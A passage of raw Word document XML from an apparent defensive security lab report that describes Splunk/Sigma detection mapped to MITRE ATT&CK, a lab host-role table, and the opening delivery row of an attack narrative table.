    <w:p w14:paraId="1E77D80D">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Detection and ATT&amp;CK Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — We apply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sigma rules in Splunk Enterprise on Windows 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the collected Sysmon and Windows Security logs to detect the observed attack activities. The detected behaviors are then mapped to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify the relevant tactics and techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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2537"/>
        <w:gridCol w:w="2537"/>
        <w:gridCol w:w="2537"/>
      </w:tblGrid>
      <w:tr w14:paraId="154AE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shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="21280AF4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6841484B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDD3D78">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="0CD86E81">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78AD9BCA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Example role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="1760B809">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E086D96">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Telemetry to collect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="48923752">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05375A90">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61CE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shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4DF44487">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06A364C5">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="37B36C7B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="246E279B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attacker simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4BFBBEE8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Metasploit console/history where appropriate; optional auth/system logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4AAE2C19">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Connects to Windows 10 in isolated lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="263E2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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5069CA85">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3434683C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A058FCD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7AC938C7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="784A9397">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Victim endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="060D282B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sysmon Operational + Security + System/Application as useful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1EC4BADE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Outbound Meterpreter HTTP callback to Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F5A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shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="23DE03B7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75F7A804">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E92AE80">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="27BB14E1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28D4044F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2C5F5997">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Splunk Enterprise indexes Windows 10 + optional Kali data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2EBF9EB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Receives forwarded telemetry; hosts detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="046E7B53">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CAD3FF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74641D54">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>04 / ATTACK FLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70087A92">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="39"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1021" w:tblpY="85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2537"/>
        <w:gridCol w:w="2537"/>
        <w:gridCol w:w="2537"/>
      </w:tblGrid>
      <w:tr w14:paraId="37E0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shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="51813A10">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33749C83">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C63C06C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="781308DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15AD87CB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attacker behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="0967D0BA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A6C57B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Victim artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="378D18BE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B8B530D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SOC pivot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F5A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shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="16E57791">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53D2B285">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1. Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="163BBC74">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Social-engineering lure delivers payload through a chat/service or other channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4C1E8993">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Downloaded EXE; file stream / MOTW evidence may appear</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7BA1E1E1">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Filename, Zone.Identifier, URL metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="333C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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="07EF8C3E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
